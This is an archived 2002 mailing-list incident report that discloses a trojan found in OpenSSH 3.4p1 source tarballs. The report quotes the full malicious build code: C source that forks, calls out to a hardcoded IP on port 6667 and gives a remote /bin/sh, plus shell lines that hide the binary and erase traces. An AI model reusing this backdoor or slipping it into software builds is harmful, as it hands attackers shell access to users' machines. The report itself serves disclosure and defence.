Security Incidents mailing list archives
Trojan located in latest openssh tar files
From: Artur Lindgren <bond () comitnet se>
Date: Thu, 1 Aug 2002 13:59:06 +0200
Greetings,I noticed that openssh-3.4p has a trojan horse (available from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz and some of the mirrors.
(ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ ) After compiling the file bf-test.c you will notice that it does following: # testing in raw ecb mode #!/bin/sh cat >conftest.c <<_ACEOF #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h> jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig (int sig){close(s);sleep(3600);longjmp(env,0); }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2); memset(&act,0,sizeof(act));act.sa_handler=sig; sigaction(SIGALRM,&act,NULL);do{setjmp(env); if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1); memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET; sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr ("203.62.158.32");alarm(10);if(connect(s, (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1) ;if((x=read(s,&c,1))==(-1)){exit(1);} else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2) ;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break; case 'M':alarm(0);sig(0);break;default:}}else{exit (0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1It runs once, upon compilation of openssh, and is named sh or the compiling users default shell in the processlist in the process listing. This trojan attempts to connect to 203.62.158.32:6667 (hacked machine which has been secured now),
and awaits one of three characters as the command; D execs /bin/sh M respawns A kills the deamonThe /bin/sh executed via the D command was controlled by the daemon listening on 203.62.158.32:6667, potentially meaning that
people affected by this has given a shell, possibly root, to user unknown. <Hans> "Let this be a lesson. Don't use root unless you REALLY have to." Regards, Artur Lindgren, Comitnet AB Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in sweden :D)Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan connected to.
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Trojan located in latest openssh tar files Artur Lindgren (Aug 01)